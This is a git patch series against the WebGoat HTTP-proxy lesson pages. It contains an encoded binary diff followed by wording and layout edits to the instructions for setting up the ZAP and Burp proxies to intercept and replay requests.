z;uNjGgkE$!bNdRc*Wzz~?E<^M*}sd~{FbTGsZjVysIThBXB=icf?rGguiQ(Kcx<Pz
zdL<0OC>~+hAx<VZ(?1Gny;l4K=PGsK*O3y2;*c+l20FRkNGNrOL|;BiqB1HS7!Und
z6$M-yP|W??veHOIwODWwB|X2E2Dy^RdZjc9&u+zE?(HcErf4m`2@E+*=U?N#Y+U_l
z)RnB{lT%rJU4r4y3Q9yfGoTVq|B^TOE8-K<Tn1cb1>yaqvj^_^bZ50Z!}~oEhdr6k
zXmc3<$2C!@mtcSew%Uko9bLwa9vMLbiMy@-vwyqi!EZ@Qn(bvN`JgNMUt)3{Z5If7
zsD5=ZvhI4I0Os}Y|KqJGrzsia3p&tsY5tzaPF%h)Xq!qXU9{Zl%qoKaQgTOxsrrrF
z0x86JsPDEn6@ND9z=ounVRaC5R@3j@XXq&qFE)~J`>XBiDO3w;0JP%Tly(&zmVeOZ
zX>7e%WSsHxK+uqUy#(_gmly;clC@FZwRxD-ubMvT{XK7CIoKfWbdTbScM-mO$p>CO
zj2k6^;BYAX{GY>h8ego)YwoGx$>+T~pjG5WZpwy}>d_H)#R6kSy><&PWG)dm(sx`f
zuBY6sVw9l%j&7WFz?l+O4tP`WdYvsRvYhC=Gq{PCDP5qvc+0srb6|0`vVcVB+>O62
z29T6uIplZHS6CpyZQ)Q+UXCQpNC%aN?zTl+L>hH3QF3T#qs-48hj4dp|MR&fto-#!
zAKFFGKv`*a($EMctd~1Z$0wUI5lRN{AN9QkLOkn#TR>2txHr~H#==vBCPJk~mUNU6
z%ENjP3U*7AhAt=*>!X4_!n<u>)3wgioKrUaLmu&pYG;=P&4D1!>wmt+ZqEI^Wn~|0
zI4MRHo?*nNmV!~3G<rhMTWL>keVB-J#ZfF`6nNr}jpU{5>hBXx>nF2kfkw4kCz-LA
zU?`{Nd?L7EiHgoqZr?}SMAOA22b4ESERb}hv6ozn;U`)0q@g!hTL5<cb*31*qKn&D
z@%3h<V>c;c)F1V2os+GYx7EIQ?<;QYZ`2g@80~|9A285v8eM-8zjLkZCi)$tJ?+-P
z1TWdmI5B_Q>VN!v@eE#OWjPBC%3PCM68;2^E+f<aVaxt6Y>utwvRm_I*aDHbgbL5;
z`i0I9YOB<=yvGdK@}HaSzuF4_{2Zf6y~&dwKle+!?}}hzAW{IHfWb+MAv4k(r!qg@
z8*;mW1~B60|F5v?4r?-N_LfyvQLHPSC@M%11S!%jSU?3tqzOcUP=pZa(h>zkk=_NQ
zi1fOI-bIuuB~n5N5Rpy@JpmE|_XK3u{r0=}^6&=_&w1Z--Z^DverM)4sjzy;?024H
z0)P>I`!J6!cGBB(G<@&Rn_0o#tUyqo{yvDRFjjS_38uZ<4b&{*@2_6lEqRVtEJ#Ii
zxwChKe0W;)xF^*NMXA>6(shW&IltIn*~e3Sg#H^Wm^8ILMPM;UNzW$IUj=&Y{InS=
zA{zx?p1ROtZ*t5^LI>e*BWfw&O&c}IB^-Y3+*Jd?v6k#33b@#uF+6U?daIP{VG`s6
z7d!RmO5sQ06t%@^<@y<Amb{V*Yq$LO-Mw#ViM?kPo1Gnd5kNP$C_@l?o*X${*9{tr
zO|o8nuPJKxWGv7V_jvKQ0-kjDo_?I|^IH}?znm-A?51N^bMdMA^<wK5F<Rsi$Agd6
zDPEu|`nK%?&?sr^J~d#sMcyH>K-J_Zko?F)-oW6n9HW}n?3OVjP+cVKDe_NjhSZ_^
zD8B1^T@^QV&SrGeXW@L~FS=g{X$aCB#`9}v3&0zO_7`EVzLw?>CwWT{DYdDrxt!b$
zr|`bW&tk!u+lvx}WIb3N(bk{xEifWS?jn_xL<!(1pL>Nb2H{Fjr&|wD-v&!X(%md3
zM*u?eN{7ICKg~vzD&(a2<+*ii{+sOMj{x5oPj!y>Y<r|94=c26%9`>8Pt~pNdPN#3
zJ!%K1ctwz&Y_EAROJvRx7xAekGv6f}sET^QyBWE6nu;OuM#Xr7k#rE>9bjk~(FZ+5
z-9o3EW}RwsaI7s(x;o*wsmXP@sJkiq3ZU9SceN@KmCh~@LmMP%B7gi0aq&v0p-qIk
zb7|RCXGZ$-AcKL%OS980T(73F;`Pc(nq488AjErHM>-l+7)7=ooy67KJt;HChxO&q
zUwJOLbj>IPPTj=kS5u`s4&3XR**EWBbWfq`JZ%ntCxsP6L~wfC0=C#Xu*Hy7Me$4R
zgWr`R=_&rA%s&l)SMxe=hEbL22-0i6BB->$Crnz%TQUqf@1(lm7`^5lQYaSV81k3=
zH_f!j?r*(#_QnkC%}Be4bc$X`_9FabdA3K7mi{;PJn0X0oOu%_2uO>g0cADlB23N<
zK@iaw$7QoFouUcZF=k?%`@~~i5##MyWt{8`6YchU1{{$F;0Q55acNgkfn^<K=WY@o
zw7GA`9Zq%vI0Q-#_lmZ{(VgnD2Y!O=u#vy+FBY!a=jd%6#fCcDXHa(Iu+radgIo_{
zA0+Ckn2cmg=jR^6*aJ&cEbQ5*?1R_wwpD3SR6>96fLIhCn`W!Ek*wr#=YUKiIibfn
zBiZmKI1~Qzwt<yr)dOdNM0tv)HMteD+jn2egun}aBT|pWjDPcgM2>0cYF^APLq-SB
zDJRtKFVj;W&U?eZrw<_=al%>n5REh4I_;mY)bg_SVibsEPu||a>cE|^XreNq7%=p|
z{hNv$lMhrZU+_uJ1=+rz<t#RVCtw~8RNF8EmW7*Dw7}=$L&S!^F5I`_0`LLgWXs6o
zC{a1nxcBF&2s-}9$%+mn$0|JTzfnP<3iW%?f;@Q{KKB=F008#g+hAmVd=J80Irzo4
z8g~IV8>5_3Hae)0l4c?^z!zAdCC2tLQH&!yZTqtjII~hU><qH6*gg+?QyM-{%yj8H
zu?~2hI{7Z|hGanuW@hCJj$NM+X5$PN8?8UXGYU1XlvoLCycb(ZRat!2Lpn;+Is#i6
zeJ}V=gN&rC`{-pybNP$o(o>%zJ^4T0P0lKQc9ch`lde0ek4WQc_bX5@Vvoqk3kiBC
zD-H^eZVHT{?w(t-9&GtDoFrix=|Q=FzbAsEYpNvRktu#^(zm=(;}?@?7n<~Y9tROG
z`{|*?x8!Ju--DUAY-vTzKjh=H)bnmQF#FzUmKHz0ts;OiG#;<m?bK3iSXg%KxL4jW
zsA#p#Sdj#XVEl30dRh@KP@`t4ruR~$ugzBe!Pvybdp=r#AZW`#F9B&p)2SkP>o4jW
zCMV`~CVKa29H>@f;3xCsFl^^<Xn4I~Jx)7)U|FYt?PgZn)cTVF5z;dw^k6|wvvJn<
zzlRQHC-3V_|G;f<2eudX2`dVJSrG`sSMI4ht!qSqUFuC!+<8XVMT8e$twpSk`7G#A
z*<PQT+M8Lp_)Ks{(FAt&Q^@<jkb`h|E&=uZcWznNqg!#FTUzzdjibEr*90;Ap}+VT
zh?(i6-LKR;YELH`{N(|}JzPOPscL?QRkc4$RTgAqTmAH({zK*d1DirD_02)3FJ5d0
zQ*H)}{j#D(5rbD~hq#$`dvChdfSXYXS?#xj&1QS)0i75b?O~YH)h`he!-G6ipMCIV
zfb62hK&=H-253dGo;<UY^jW#m5HrcUDJh1O`AEF;gJz2KY}{RFc@g{b$2*l0K-{zE
z$;L-#)Nz9#dzcKl6cb&|UG47#{Cg6<CdABjm!iE#q39u5Gd!&@;FORDaUAm%x0qh`
zQt9Q{UVf@j31aiW2O-V{i4sOM!1cTfsR*_RxH+o5Rn+8Ein0@O)c20qqm%bs{X!qr
z@k4~209LhFK}@RUD4hw7AVR;DpbnjnlaGj;nVVuVc|g04G9%~#?kJ7Nn+vD$(OGqz
zQH^aZ|ND4Tvt(zQs%s3)fiSeP4%E^oqVF`NE?;(iJsmlY&X9OaY4MeMf}e<mxqTXm
z=xU-jDxN0;btZ?Y@qNO&l%|X{Tqp&v-wsiH&IJw|AOf!lfU(43bED2)JgtCtXNS)!
z9VZYNSiC$y0i4chgIJ*5t#jTn%Pmx?weoueQvBg|T~1J%){-9ks}fq27a%Z{kW5=1
z+m=Oe8?ddaL-}Tx|0t)$&~ipye#l1FC`H$uzi&crhFxesvNfT#w+GP!o$aA90abA?
z{9WNDG@ARQ;kQY$Ro8q88P0>`#ua;LJ8<qJ>`lTKwZFlRx?Yt1L8mnYY}BTb*xYD9
ze>9m@B_6^h46nTbvE1oAxWL(s5y{&Y=i}a+qxN6PmHb7X6_2e}E-{1Le0lb`+kncj
zlc6aj@)BDIkveh8RYuTobB7i3S0}h?t`~YxME~0~qQw;np_r&>#eOe!O_)*Yfj0Mc
z-eQ2{56eQ0xML3!m5ryD*<mEpGNmkQ^%QgURrrI|3`Kn+oG4aW@3<Ujaeb}gy!mUu
z6StJ$suo7`q`!N{-ndz$_BZzIZLp!>Q5XgsTy{Cln#ujYD77ZV01zuSnX)c@DW;*5
zq0zV!Zgi8W>O?sq2BHlYh+4>0Ug~ODGR(^jf2>D|%VPbaoebN^HNjD6v^C^f116ts
zxl}i~Oq7mTD3v;;Lw_x0#@@K);BO9KQxBTgMqyS+Z2rgfVh<2qj~xhs?PF=#(uDdY
zv0_#>9U`Gm3sC22W(ol{g7L>KY6i6Q`}5sDqT`&nh0fyToXFq6b@|c^0tI~t$otZ2
z&hP0RRO6*REy9Sy>x+2fr9=j`L#NM%+hPW@IXM&V?QLe<kN@s@K-)*N_(hz&Da|d)
zP{ny*@nX#Sny`MM>Gi4hq83_Ikjp~E#U)})7|DBN;Yo2Y>5(MPx?yh0HvF;~cY`XY
zSB^Z~;9gl7xBr!WMeGH+ET1bF<ZFx_4))ML6>#W-;syhUee{X3e2IAs6a#J;bd(6A
zIaU@V>UrM;VvJ)fU{0}dB@Pfe<YwtMD|yyd(M36`a`<HbT5ZNBm|>t5A4JO)lmlxm
zVtpzVzG$;d|6I$eKx_Bp-=kX{yA^!Ug&Pjsyv3STc=^<n)nuUDYzhtXOqc#HRY}@!
ztPK^SADNdbX(jzFHOEl3kipB8_s%5@aAeq!nxw*30h4w@#mvBAR!~Rmbs{UfS5Ci-
zNNyGnXVzR&RYA@vP`+zndlMVz6l3A<2L@>A&Ja}7fpbhh1MC6w%ecp=mBY~Ws1CC9
z`g0q0H@N}(+4jlz`+_=-)jUbf=rl^yD`3S`zPxRT@oSm<ICRXRFN}m8bWe+c;X`{N
z2d6&2lr}n%BTRHlec-8n<gtLWN|6;xzYK2Brqm~a+WFK!Hh*9}spYcN-x42-&|J^7
zjaBxv{&{_&qK#8rwogdQb0-t0oI+c2&w=5rJ-4ZbaShmFtCl8)!zLK~QT5rYg%xQD
zfeEe=feDKDtI!885B@FM{|_%hH&Sp3REfAnoc$y-R6eMhLPm6?Gm9k8x-W~DQ~QXM
z7=Av?^eVIEM(u~fjo^l%;b6E1^p_5vuKEPvyCJJN3)Ee>@4!mR={0B@)ib4q1tcWZ
z7i_51{%92%z#0Od#PH9z6z)sPKd)xn3uZ4%;nv5h3L+ABT;TdXZZCsAuXOr;^>>L)
zyY=&(L3HcWxZDAHA$;5@FUY2^9DeBON9-$LN#q$PwSt9`mL`AAt=w&bEIpVC3gleL
zt90@S<WWk|M!QkCm(IA=*!g@#w;J#I_|)WNLWltLDaWR^HBLQ>J}7uo8;6|sRVj39
z=W!iwEty=(%EN>V^IH;XPj^*pXt<zr*8NV_3GZI@zq9Jux%tJ10e#0-Jc`*r-UnzS
z9)bpE8V-zH6dz?)+XCai0<en#Q;)oT;eI0(u<UHk_G|V=C-}WwYo%`a=-i6+y|Npz
zgrxR&i+ZxOX?0A4()zxlbdcXOCH1e4lMHZ!{be8tbn%2p#!egvbF25+`{aU!_0%Cj
zt&>x4_dMAr#T0o$@N<2<PR;cnr8dz)2}H^Cwto%E&kh!gIK8?mIvdnPNg=G-1oYo9
zj!-<&dm}R$F@6kM$ZR}EzZ=li(X0Fir2JasMMw>csoTH4_<(XTUaqIX)C~l{6bUo1
z*K=pIyM470DgBzaYpX!zO6I^a|BV1&0f^4+YJ+^ITN#eiW1{=fkbHupTJ77I{gLAA
z#Qds8x>;PI_-x3cduOigALb`f{U`sLDTZW0Ke$s!_r>$7#Wl{jKO~o!LZvLVXvs@4
zp_xQ`y)NyXDIc>K%@g3-oex{Pe!2RgJg&P0{h1aqj}myAcZRb@;?F`?M_N}e*LX6I
zAKt=K3gkaxPpMkN@Y!LP)U?JF358Y$1HV|sZ0Xh|g}IvOs;5og^uyp)PdJ7sG6E={
z!un86KIO2{d#b4$z1EzpZOX<%H7ver0TTr4;i)>?0b}F%9-VAql6xz<Z`-K@_|cck
zuvqRNwfhdG$tnXN`r#*`yb!IJT^Y-qniGN-LEKX&@x;;Fw8HdiukyzPif+3~V1S7Y
z@hvT44&O$==wxR%u4aOwG!M2Sy)-8oII6s9#oKFLiPkh;wp@p_Zs!5J+7MX2;;tr}
zdCE)pXtRxKsd~#%`P+qkBrdCFnP|9yhb|@Sq5QW#*`Tm_cNt4;X|r*)hU&i;INa|6
zn^*UP`)eak`q7v)(Tw>Z&hX_6{M7v>w+i;pc4pPoE8uHwyCG)fZB6=SWr{uYT7{9J
zouj&?zQML1su(kA64BuPK74^adSOr6mSjN^8UWJpN6y#10VQ0$KguFR=YI$n?1!I8
zLAr-f@G&rPbbL;36=YmSuK~O?gBGCVbRe*^w`(NetVNi`?B+DJ=2vN;k^i}$-Y_EH
z&b@j@{>tgF5P_ZOZR&Iw`7F@RuZ9^i;h+4DIW`4dKQXm=*)IR;8F64aQ-gu5=Qla^
zv^R!}UfM$8#TZyKAnLn*JF>&?c9h#j^)0a3QgQaI9baV@6~-|B;GBG^XJ3UHcOkL<
z5(0P<e~bQ^T=N{gwbRkfoB85XAWlV7+P29llF<hT=!20`2;BbDj>n>`%^8AE!u(8B
z1w_D_(kfvjRb<;Q&u;OeKKc_#&@l|4?~La!ixtX&GT4u~BT07Pyj0!#Cm>ke{#Pf(
zlaW6TcsezTS2zCxxwz19>#Pl4px_z5p>7=3ErX0UfFJP1R?#$&-gk9tEP&GR@D>N_
zjva!^=kNnnOc_ORZUt$35d|3-hXO|akLPdd+9i=~^Y%drUJFh8z-zjM$lqb3vX><d
zV}-{PO=FqOzdpPrDuPHk#;@K<o81UppL?}&@bZ_TaSo;Nm9mERT1_Ks@Z86z$wrmg
zTukZ3R$-%D;noEKqDIA`AQ*<Q>w@W=eQ<)`SlDsUE}ef0(}D)?hjL<N&f$<wV_bcx
zxeHZfO2v)?>}y;j<4LP$7^Im~zOGB?Y!;1HY`r6kYB3~MBD$?|ov&(sOz!_|7|VnD
zmNj=`$2Aru)>eK2@ForQuB<4S?eix!QpNTfAoB2ZQ0Jr$l<869&@Y{l(ZVbmBy7DC
z=nN(Hm^bbcndAR>NdXfd2rtYt9h;!KS(*aG^h~LDyaKYXkMGdhFkjG6UxE*j>&9Re
zM!$w_)c+K7uC39MLGdt`LUqW@nl5r&J7ckH&K~0)%3%8^D`yy`%24~y+Co=)s|t&+
zE;@3ImR~)=bZ)sXyNYI#Z*^LsS!%E&K_vdjOp7N8$d|CV$TZQIe?MBLlEQ<~U?kh|
zo6xZRlW~oWZWaOgN}>i0jwJOD@1!h81`_IfW`{nAcDx)sHu}lj4+4t1HYo}^#&aM=
zV$?Ok021TRb+@pMKB`}nr}L_x5SoCAG&{Zo0-+Qg!CrCeYLt^+!Ph@K1R1#O?EiI4
zkB=e9?VKR9v5zqolfnp%`-c*44WPcyElTjMo#!>$__*X(M-Vv*i*(AZR?QHyjk{K9
zu#CBEl3G!}ELNUFFPk17Mcy>JV^Rs>o!zK?d5?g^4HWA8H%Y1$*vu2>#L7JaO4@CW
z#%xE5k@BO#qw@EWfukSWuP>^AWb7SX$IiM%$IQ}Q6su7R12d~P+;g$^PT!Plmfw9A
zUZkl|mF;Q<PB}pI8h`8<HH;n6wT}P5!->t-vIYyAR$PHp1>Sc1*XrVm$}5J-_gQ%S
zNKi>+@^WmQVWD8J670_II7y_TmeiOY`5B?sd~z4YC^Dtko(tPAil2>jx@UbSS1Mmz
zvO2`!VJwu7I3rgYXtRj?o%IegU<H8cdzhz+t$2LFx42UC>s{LF*$NB_x)#L)hXrp_
zSc}9^|M?|#j%U7be;hi`GCPFU^vGe;<2spVb-G=M1F>e%Qp;GDh%&m!l+sg)iym3J
z!eoTFX91|VLBF{sOG`+>3?6dq7cBEQCFwS57Ja5DPBwSrQqPU)C^DS>1<y8I^Bt!f
z_oq#u$pw5C`g^$~^gBn|=rfv}MZeyagnAh>c0|5w{-UjdRA4OAnt?<@G7#`(g?s3z
zyHy>N7etzEpPSOY4V(@TW(giIvaC*gaYMa(m|Mj>E@H+@@6R|dMi{PaJfL!Fy3>B!
zx#Ra)Ud3)yFCl(9?zME|L+C<DclG+DM02>_y@uI3v{Fi(OaGj%G0NDQZZ)B;t~%QL
zRm!erL}2#S;eabks2=XZq_1M7EtQKR-w@U{<!V<F&Kg}DcWJWqg=2@)jn>{$Fa5d@
zU@p;LPFaVK?vPRvsKdSq`La{BT539-^^W?C&U*Ld4}8RVsgBq99`ErlL9J3-<DDhA
zTP2+gnCY1xOx$FF9;%MCJzeF;MIz3`jUALSYPjya$o7OyEMC8|+>&J7Ah{e%qLUab
zbptnMbYPhQ%eyUDsKN9@PY)DR+(|bAc&?qUFM3InXd8~OZB>;K)rr<q=WQ^Jgr#(i
z^8$HZ=s$;R@izawT!QI6vR;|+YWHVa+Zd0T9*16AMWvMqI|{R?ZqzQ^Tc2i1^MS0L
zxfkq1;+=w6fMSV5)hZvV2nTk(@Nas53N}_;5I6kFe8#y*-6~9b48epJjxR;egbCTS
zOYFtl!Zuu?m0!~lm5<&EH(aCvm>!zG5XG+p87p!$Bx;@`mw_zs9S5YFqnTT;tNRRm
z9EFH6{TaE(zN*fxG+PTQbR%-HZMe@OXn%tZd)|}#KAoFG>f=O(pSxA(c!W+jo~vz|
z*eE&)(^S~`3H=P3>-4^Zf2v`*0ngu%(RbX1cSY%KV$cy2i*WZOz4|D}1I5EscxQbE
z%{MqHXR0hW+P1QAF%)*XK46*3+;)BGalCn7dp?({hX~_5tP8Lkzk0TE=-u?=#-x^=
zcXV!9%T)=-x|yDBaT#}nC*Q=?b5aAH50b05WR+=!Nb+D>6}?!i(NRMck+u3-(1UjM
z`bFn-x1cXwE`oC6fzGL(&LmFE<?DPr+>xv3z0OEo?(A9kUz&TPJw{ft9DXcuZfc#c
z3s)KZB0d+%6EHpQ#F)GQA~=jUzK_`!I?{Mt$z<o9Y~m|2jenm}|7iGY?#&LL14x#I
zzg2*OtDZJf`k2+QEYn#$qksT}J|a~<yUy3wJ)n+oIfz`uqjo3$n6nQ^uwUyR9zXeu
ze)Efp7~awC1V_K~3WcZsmmHOyzdV@eZnvp)R281-m9c2t#qzbtc%xe#mU)s}AA*8q
z4SV(Hzj5df_NkrEf$tb$Q7T!Hsoyda)D>BQA@bbyrYr8Ly|`k+i%ZWdrHa>?{Dj93
ohcURNz|Upme=$EkouY2+R{CJL@Dcx;AfuJabv5POtB*YY2M%c1TL1t6

diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
index 312f90180..a113bb9b4 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
@@ -3,11 +3,8 @@
 
 Since this is an OWASP project, we'll be using OWASP ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise, this will show you how to set up ZAP to act as a proxy on your localhost.
 
-=== link:start.mvc#lesson/HttpProxies.lesson/2[Setting up ZAP 2.8.0]
-
-* First download and install ZAP 2.8.0 for your operating system
+* First download and install https://www.zaproxy.org/download/[ZAP] for your operating system
 * Start ZAP 
-* Configure the proxy to use a free port, e.g. 8090
 * Start the browser directly from ZAP
 
 
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/2zapsetup.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/2zapsetup.adoc
deleted file mode 100644
index 51e375c4d..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/2zapsetup.adoc
+++ /dev/null
@@ -1,22 +0,0 @@
-
-== Setting up ZAP 2.8.0
-
-. First download and install ZAP 2.8.0 for your operating system
-. Start ZAP 
-. Configure the proxy to use a free port, e.g. 8090
-
-=== Start ZAP
-
-image::images/zap-start.png[ZAP start,style="lesson-image"]
-
-=== Configure Proxy's Port
-
-* Select Tools > Options from the menu
-* Select Local Proxy on the left
-* Choose an available port ... Since WebGoat is (or will be) using port 8080, use something different like 8090
-* Click OK
-
-image::images/zap-local-proxy-8090.png[ZAP local proxy,style="lesson-image"]
-
-In the options menu, you can also change the language. By default it is set with the language setting of your operating system. The examples are shown in English.
-
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
index 1d79487ac..981fec9e1 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
@@ -1,4 +1,4 @@
-== Setting up browser
+=== Setting up browser
 
 If you use the latest ZAP version (>= 2.8.0) you only need to start ZAP and click the browser button to be able to
 proxy, see image below:

From 32a41debad8b7e57bb74c3990815f799418d2685 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 14 Nov 2021 16:58:59 +0100
Subject: [PATCH 095/227] Fix spelling/grammar and reference to ZAP 2.8.0

Resolves: #1141
---
 .../resources/lessonPlans/en/0overview.adoc   | 30 +++++++++++++------
 .../main/resources/lessonPlans/en/10burp.adoc | 28 +++++++++--------
 .../lessonPlans/en/1proxysetupsteps.adoc      |  9 +++---
 .../lessonPlans/en/3browsersetup.adoc         | 28 +++++++++--------
 .../en/5configurefilterandbreakpoints.adoc    | 15 +++-------
 .../resources/lessonPlans/en/6assignment.adoc | 22 ++++++++------
 .../resources/lessonPlans/en/7resend.adoc     | 27 +++++++++--------
 .../resources/lessonPlans/en/8httpsproxy.adoc | 12 ++++----
 .../resources/lessonPlans/en/9manual.adoc     | 22 +++++++-------
 9 files changed, 104 insertions(+), 89 deletions(-)

diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/0overview.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/0overview.adoc
index a5d60970e..7d6434d94 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/0overview.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/0overview.adoc
@@ -1,17 +1,29 @@
+==== What's an HTTP Proxy
 
-== What's a HTTP Proxy
+A proxy is some forwarder application that connects your HTTP client to backend resources.
+HTTP clients can be browsers or applications like curl, SOAP UI, Postman, etc.
+Usually, these proxies are used for routing and getting internet access when there is no direct connection to the internet from the client itself.
+HTTP proxies are therefore also ideal when you are testing your application.
+You can always use the proxy log records to see what was actually sent from client to server.
+So you can check the request and response headers and the XML, JSON, or other payloads.
 
-A proxy is some forwarder application that connects your http client to backend resources. HTTP clients can be browsers, or applications like curl, SOAP UI, Postman, etc. Usually these proxies are used for routing and getting access to internet when there is no direct connection to internet from the client itself. 
-HTTP proxies are therefore also ideal when you are testing your application. You can always use the proxy log records to see what was actually sent from client to server. So you can check the request and response headers and the XML, JSON or other payload.
+HTTP Proxies receive requests from a client and relay them.
+They also typically record them.
+They act as a man-in-the-middle.
+It even works fine with or without HTTPS as long as your client or browser trusts the certificate of the HTTP Proxy.
 
-HTTP Proxies receive requests from a client and relay them. They also typically record them. They act as a man-in-the-middle. It even works fine with or without HTTPS as long as your client or browser trusts the certificate of the HTTP Proxy.
+{nbsp} +
 
-=== ZAP Proxy Capabilities
+==== ZAP Proxy Capabilities
 
-With ZAP you can record traffic, inspect traffic, modify requests and response from and to your browser, and get reports on a range of known vulnerabilities that are detected by ZAP through the inspection of the traffic. The passive and active reporting on security issues is usually used in Continuous Delivery pipelines that use a GUI-less ZAP. Here we will use ZAP interactively and mainly to see and modify requests in order to find vulnerabilities and solve assignments.
-ZAP has a graphical user interface, but now also has a HUD Heads-On-Display which uses a websocket connection between the browser and the ZAP proxy.
+With ZAP, you can record traffic, inspect traffic, modify requests and responses from and to your browser, and get reports on a range of known vulnerabilities that ZAP detects through the inspection of the traffic.
+The passive and active reporting on security issues is usually used in Continuous Delivery pipelines that use a GUI-less ZAP.
+Here we will use ZAP interactively and mainly to see and modify requests to find vulnerabilities and solve assignments.
+ZAP has a graphical user interface but now also has a HUD Heads-On-Display, which uses a web socket connection between the browser, and the ZAP proxy.
 
-=== Next pages
+{nbsp} +
+
+==== Next pages
 
 You can go through all lesson pages or click on these links to skip some pages.
 
@@ -19,4 +31,4 @@ You can go through all lesson pages or click on these links to skip some pages.
 * link:start.mvc#lesson/HttpProxies.lesson/5[Filtering] requests with ZAP
 * link:start.mvc#lesson/HttpProxies.lesson/6[A proxy assignment] with ZAP
 * link:start.mvc#lesson/HttpProxies.lesson/7[Replaying requests] with ZAP
-* link:start.mvc#lesson/HttpProxies.lesson/8[Replaying requests] with Burp
\ No newline at end of file
+* link:start.mvc#lesson/HttpProxies.lesson/8[Replaying requests] with Burp
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/10burp.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/10burp.adoc
index 290f4693d..220ff75bb 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/10burp.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/10burp.adoc
@@ -1,36 +1,38 @@
-== Burp
+=== Burp Proxy
 
-Another proxy that is used a lot is Burp. One of the exercises in WebGoat can only be resolved with Burp and not yet with OWAP ZAP.
-Burp can only be configured manually, please follow the steps described link:start.mvc#lesson/HttpProxies.lesson/8[here] first.
-Burp community edition can be downloaded as a plain jar file https://portswigger.net/burp/communitydownload[Burp download,window=_blank]
+Another proxy you can use is Burp. One of the exercises in WebGoat can only be resolved with Burp and not yet with OWAP ZAP.
+You can only configure Burp manually. Please follow the steps described link:start.mvc#lesson/HttpProxies.lesson/8[here] first.
+You can download the Burp community edition as a https://portswigger.net/burp/communitydownload[plain jar file,window=_blank]
 
-	 java -jar burpsuite_community_v2.1.04.jar
-	 
-Ignore the warning on using JDK11.
-Choose `temporary project`, followed by `use burp defaults`.
+[source]
+----
+java -jar burpsuite_community_v2.1.04.jar
+----
+
+Choose `temporary project`, followed by `use burp defaults.`
 
 Go to the proxy options and change it to use port 8090
 
 image::images/burpproxy.png[Burp proxy options,style="lesson-image"]
 
-On this page you can also export the Burp certificate and import it into your browser. Similar as in the instructions in previous pages.
+On this page, you can also export the Burp certificate and import it into your browser. Similar to the instructions in previous pages.
 
-Go to the proxy intercept page and click on the toggle so that intercept is switched off. (By default nd in the picture below it is switched on)
+Go to the proxy intercept page and click on the toggle so that intercept is switched off. (By default nd in the picture below, it is switched on)
 
 image::images/burpintercept.png[Burp intercept,style="lesson-image"]
 
-The start a browser connected to the proxy and start using WebGoat.
+Then start a browser connected to the proxy and start using WebGoat.
 Now adjust the intercept request setting by extending the rule on what not to intercept:
 
 image::images/burpfilterclient.png[Burp client request filter,style="lesson-image"]
 
 Use e.g.: (\^mvc$|^txt$|\^woff$|^lesson$|\^gif$|^jpg$|\^png$|^css$|\^js$|^ico$)
-Then enable the intercept by click on the earlier mentioned toggle.
+Then enable the intercept by clicking on the earlier mentioned toggle.
 
 An intercept will look like:
 
 image::images/burpintercepted.png[Burp client request filter,style="lesson-image"]
 
-Finally you can look at the history and add filters for the history and replay requests, from this screen:
+Finally, you can look at the history and add filters for the history and replay requests from this screen:
 
 image::images/burpfilter.png[Burp history,style="lesson-image"]
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
index a113bb9b4..30952e5db 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/1proxysetupsteps.adoc
@@ -1,10 +1,11 @@
+==== HTTP Proxy Setup
 
-== HTTP Proxy Setup
-
-Since this is an OWASP project, we'll be using OWASP ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise, this will show you how to set up ZAP to act as a proxy on your localhost.
+Since this is an OWASP project, we'll be using OWASP ZAP.
+If you are comfortable using another proxy (e.g., Burp), you can skip this.
+Otherwise, this will show you how to set up ZAP as a proxy on your local host.
 
 * First download and install https://www.zaproxy.org/download/[ZAP] for your operating system
-* Start ZAP 
+* Start ZAP
 * Start the browser directly from ZAP
 
 
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
index 981fec9e1..4757ccb90 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/3browsersetup.adoc
@@ -1,27 +1,29 @@
-=== Setting up browser
+==== Setting up browser
 
-If you use the latest ZAP version (>= 2.8.0) you only need to start ZAP and click the browser button to be able to
-proxy, see image below:
+If you use the latest ZAP version (>= 2.8.0), you only need to start ZAP and click the browser button to be able to proxy, see image below:
+
+{nbsp} +
 
 image::images/zap-browser-button.png[ZAP Start,style="lesson-image"]
 
-{nbsp}+
+{nbsp} +
 
